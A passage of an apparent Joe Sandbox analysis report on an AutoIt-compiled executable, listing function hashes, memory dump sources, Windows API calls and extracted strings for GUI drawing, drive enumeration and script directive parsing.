                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cde255432f47ff19ca2c0b9f350e136bb3fd014040f25ca0b01526de57591eed
                                                                                • Instruction ID: c548714d1d53419b6b8f3a665bd5d209ccb930db438c7f1b0de194a61b0d2278
                                                                                • Opcode Fuzzy Hash: cde255432f47ff19ca2c0b9f350e136bb3fd014040f25ca0b01526de57591eed
                                                                                • Instruction Fuzzy Hash: 8D12CD70A00209AFDF15DFA5DA81AEEB7F5FF48304F10452AE906E7650EB79AD10CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46298cd544ce4a48c0567b4223d4152fab3ed49af600b2e52708b79f46134e5e
                                                                                • Instruction ID: 34c3b87301b09fa05c2e13ced0f9ce9cc3de77d04c3d5291e7599b6368a5e577
                                                                                • Opcode Fuzzy Hash: 46298cd544ce4a48c0567b4223d4152fab3ed49af600b2e52708b79f46134e5e
                                                                                • Instruction Fuzzy Hash: 5C12DF70A04215CFCB26DF58C480BFAB7B1FF14308F15816ADA5AABB51E735AD81CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3728558374-0
                                                                                • Opcode ID: 9273b77f64ceca52aec2cb51444043d9b9ba5d5c85759c257787ef4d7027e5ee
                                                                                • Instruction ID: 0faf8b24c08ec32cbc97cf3da4fe2cff83669a7e09aac781a9a749e17a2aa224
                                                                                • Opcode Fuzzy Hash: 9273b77f64ceca52aec2cb51444043d9b9ba5d5c85759c257787ef4d7027e5ee
                                                                                • Instruction Fuzzy Hash: 0602C0B0A00109EFCF15DF68D981AAEBBB5FF48304F10806AE906DF255EB75DA11CB95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction ID: 7afe2147472ef662006fd6b88f6bd8b4667a2c86d8dbbc9e7771e445b1253761
                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction Fuzzy Hash: 95C1C8372051970EDF1F463A9434A3EBAA15A92BB171B076ED8B3CB5D5EF20C924D720
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction ID: 2e8ff7cdc8880be0f7d6c32a86a0cb78477b7b92492b8201ac5a9f9ff96d8d64
                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction Fuzzy Hash: 6EC1B2332051970DDF6E463A943463EBAA15AA2BB171B076ED4B3CF6D5EF20C924D720
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction ID: 1a38dde02c414cbd8334b1d3ca2320e0e10df6e99b1511d813967395619644c8
                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction Fuzzy Hash: 33C17F322050970DDB2E463A8474A3EBAA25AA2BB531B177DD4B3CB5D5EF20CD64D720
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 0040A2FE
                                                                                • DeleteObject.GDI32(00000000), ref: 0040A310
                                                                                • DestroyWindow.USER32 ref: 0040A31E
                                                                                • GetDesktopWindow.USER32 ref: 0040A338
                                                                                • GetWindowRect.USER32(00000000), ref: 0040A33F
                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0040A480
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0040A490
                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A4D8
                                                                                • GetClientRect.USER32(00000000,?), ref: 0040A4E4
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040A51E
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A540
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A553
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A55E
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040A567
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A576
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040A57F
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A586
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040A591
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A5A3
                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0043D9BC,00000000), ref: 0040A5B9
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040A5C9
                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0040A5EF
                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0040A60E
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A630
                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0040A81D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                • API String ID: 2211948467-2373415609
                                                                                • Opcode ID: 957d01b49f942f67372b4a4147d5446b8d237bacc2170c12fac8ee782e780f84
                                                                                • Instruction ID: e8c32653d34b58c2be073d118fd9a6b84329b7d8b7bd5d0bc3327a779b81fef5
                                                                                • Opcode Fuzzy Hash: 957d01b49f942f67372b4a4147d5446b8d237bacc2170c12fac8ee782e780f84
                                                                                • Instruction Fuzzy Hash: B9028875900204AFDB14DFA8DD89EAE7BB9FF48314F048169F915AB2A0D734ED41CB68
                                                                                APIs
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041D2DB
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041D30C
                                                                                • GetSysColor.USER32(0000000F), ref: 0041D318
                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0041D332
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041D341
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D36C
                                                                                • GetSysColor.USER32(00000010), ref: 0041D374
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0041D37B
                                                                                • FrameRect.USER32(?,?,00000000), ref: 0041D38A
                                                                                • DeleteObject.GDI32(00000000), ref: 0041D391
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0041D3DC
                                                                                • FillRect.USER32(?,?,00000000), ref: 0041D40E
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0041D439
                                                                                  • Part of subcall function 0041D575: GetSysColor.USER32(00000012), ref: 0041D5AE
                                                                                  • Part of subcall function 0041D575: SetTextColor.GDI32(?,?), ref: 0041D5B2
                                                                                  • Part of subcall function 0041D575: GetSysColorBrush.USER32(0000000F), ref: 0041D5C8
                                                                                  • Part of subcall function 0041D575: GetSysColor.USER32(0000000F), ref: 0041D5D3
                                                                                  • Part of subcall function 0041D575: GetSysColor.USER32(00000011), ref: 0041D5F0
                                                                                  • Part of subcall function 0041D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041D5FE
                                                                                  • Part of subcall function 0041D575: SelectObject.GDI32(?,00000000), ref: 0041D60F
                                                                                  • Part of subcall function 0041D575: SetBkColor.GDI32(?,00000000), ref: 0041D618
                                                                                  • Part of subcall function 0041D575: SelectObject.GDI32(?,?), ref: 0041D625
                                                                                  • Part of subcall function 0041D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0041D644
                                                                                  • Part of subcall function 0041D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041D65B
                                                                                  • Part of subcall function 0041D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0041D670
                                                                                  • Part of subcall function 0041D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041D698
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                • Opcode ID: dff338d8d21f1515c06a8a8c7e019d4ff29e0d2c87d98eb92afc78b3f90d5521
                                                                                • Instruction ID: e93fabe6d66ce82e534a24891db79ca01185e06e12bea7b5fcd66a20c03e9e4e
                                                                                • Opcode Fuzzy Hash: dff338d8d21f1515c06a8a8c7e019d4ff29e0d2c87d98eb92afc78b3f90d5521
                                                                                • Instruction Fuzzy Hash: 7591B671808305BFCB109F64EC48EAB7BB9FF89325F101A29F962961E0C735D945CB56
                                                                                APIs
                                                                                • DestroyWindow.USER32 ref: 003CB98B
                                                                                • DeleteObject.GDI32(00000000), ref: 003CB9CD
                                                                                • DeleteObject.GDI32(00000000), ref: 003CB9D8
                                                                                • DestroyIcon.USER32(00000000), ref: 003CB9E3
                                                                                • DestroyWindow.USER32(00000000), ref: 003CB9EE
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0042D2AA
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0042D2E3
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0042D711
                                                                                  • Part of subcall function 003CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003CB759,?,00000000,?,?,?,?,003CB72B,00000000,?), ref: 003CBA58
                                                                                • SendMessageW.USER32 ref: 0042D758
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0042D76F
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0042D785
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 0042D790
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 464785882-4108050209
                                                                                • Opcode ID: 4307bbea1c82c9270b3500c4aa714e7bec0eaf91bfb239c67a4fd92a250f477f
                                                                                • Instruction ID: eb8becf0d96be40dbbb2d3692cf4a1b51d1d045068e7961fcc72612536595d05
                                                                                • Opcode Fuzzy Hash: 4307bbea1c82c9270b3500c4aa714e7bec0eaf91bfb239c67a4fd92a250f477f
                                                                                • Instruction Fuzzy Hash: B712AC30A00221EFDB25CF24E885BAAB7E5FF49304F54456EE989CB662C735EC41CB95
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FDBD6
                                                                                • GetDriveTypeW.KERNEL32(?,0044DC54,?,\\.\,0044DC00), ref: 003FDCC3
                                                                                • SetErrorMode.KERNEL32(00000000,0044DC54,?,\\.\,0044DC00), ref: 003FDE29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 2ef7f44583cb3a5f1e0cc14c43d4b293190167fdfcdb75bc68580c344a4950ae
                                                                                • Instruction ID: 806bd1cb12fc41486fc21e37dd5b0fcbb1a1351b87a549ddac2a35d23fb649fc
                                                                                • Opcode Fuzzy Hash: 2ef7f44583cb3a5f1e0cc14c43d4b293190167fdfcdb75bc68580c344a4950ae
                                                                                • Instruction Fuzzy Hash: 375107302083499BC216DF10C899A79B7A6FF54705B20481BF2039F692EB74E945D747
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 1038674560-86951937
                                                                                • Opcode ID: 06caeee6d04a1a268a3c465540eacd537f51ba20d63ba4208e2668d0332d9dfd
                                                                                • Instruction ID: 4154cc6ea4b91f9fa9b15a573ba8fd7a35cb0beb2fbf565a75eb53bc1dd0c23c
                                                                                • Opcode Fuzzy Hash: 06caeee6d04a1a268a3c465540eacd537f51ba20d63ba4208e2668d0332d9dfd
                                                                                • Instruction Fuzzy Hash: 17812C717402157BDB32AE64DD42FFF7768AF24304F14102AFA05AF686EBA4D901D295
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0041C788
                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0041C83E
                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 0041C859
                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0041CB15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window
                                                                                • String ID: 0
                                                                                • API String ID: 2326795674-4108050209
                                                                                • Opcode ID: d999797282cb219312bef060d13b92ce822b1e7e9f1adaea0472f7c00563b0ce
                                                                                • Instruction ID: 4fae76bc83b2939db6be60ee59e624640274b6d21a7f0ba89869f67836288dce
                                                                                • Opcode Fuzzy Hash: d999797282cb219312bef060d13b92ce822b1e7e9f1adaea0472f7c00563b0ce
                                                                                • Instruction Fuzzy Hash: E5F1C170688301ABD7218F24DCC6BEBBBE4FF45754F04052AF598D62A1D778D881CB9A
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,0044DC00), ref: 00416449
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                • API String ID: 3964851224-45149045
                                                                                • Opcode ID: 5f9739a53a477d4d55f1b4e4dd313c0ac2c06674d5da7656b117f13e25802330
                                                                                • Instruction ID: 71c43402a9f57e89077a55eec6ea196fa8fddc23dfecf339fa7d1f369ea659ab
                                                                                • Opcode Fuzzy Hash: 5f9739a53a477d4d55f1b4e4dd313c0ac2c06674d5da7656b117f13e25802330
                                                                                • Instruction Fuzzy Hash: 94C1B5342042558BCB05EF10C551EAFB795AF95344F01885EF8559F3E2DB28ED8BCB4A
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 0041D5AE
                                                                                • SetTextColor.GDI32(?,?), ref: 0041D5B2
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041D5C8
                                                                                • GetSysColor.USER32(0000000F), ref: 0041D5D3
                                                                                • CreateSolidBrush.GDI32(?), ref: 0041D5D8
                                                                                • GetSysColor.USER32(00000011), ref: 0041D5F0
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0041D5FE
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041D60F
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041D618
                                                                                • SelectObject.GDI32(?,?), ref: 0041D625
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D644
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0041D65B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041D670
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0041D698
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041D6BF
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0041D6DD
                                                                                • DrawFocusRect.USER32(?,?), ref: 0041D6E8
                                                                                • GetSysColor.USER32(00000011), ref: 0041D6F6
                                                                                • SetTextColor.GDI32(?,00000000), ref: 0041D6FE
                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0041D712
                                                                                • SelectObject.GDI32(?,0041D2A5), ref: 0041D729
                                                                                • DeleteObject.GDI32(?), ref: 0041D734
                                                                                • SelectObject.GDI32(?,?), ref: 0041D73A
                                                                                • DeleteObject.GDI32(?), ref: 0041D73F
                                                                                • SetTextColor.GDI32(?,?), ref: 0041D745
                                                                                • SetBkColor.GDI32(?,?), ref: 0041D74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: d1eb5c74a98b09c75aeda53b419672cff8d71902c94a084ec34158bc7cfff052
                                                                                • Instruction ID: be5e4dafaaf19d4dce4ead3575c99c815d5f252c6d55ed8fc7eb0b452d244550
                                                                                • Opcode Fuzzy Hash: d1eb5c74a98b09c75aeda53b419672cff8d71902c94a084ec34158bc7cfff052
                                                                                • Instruction Fuzzy Hash: A4513B71D00218BFDF109FA4EC48EEE7B7AEB08324F205525F915AB2A1D7759A40DB54
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0041B7B0
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041B7C1
                                                                                • CharNextW.USER32(0000014E), ref: 0041B7F0
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0041B831
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0041B847
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041B858
                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0041B875
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0041B8C7
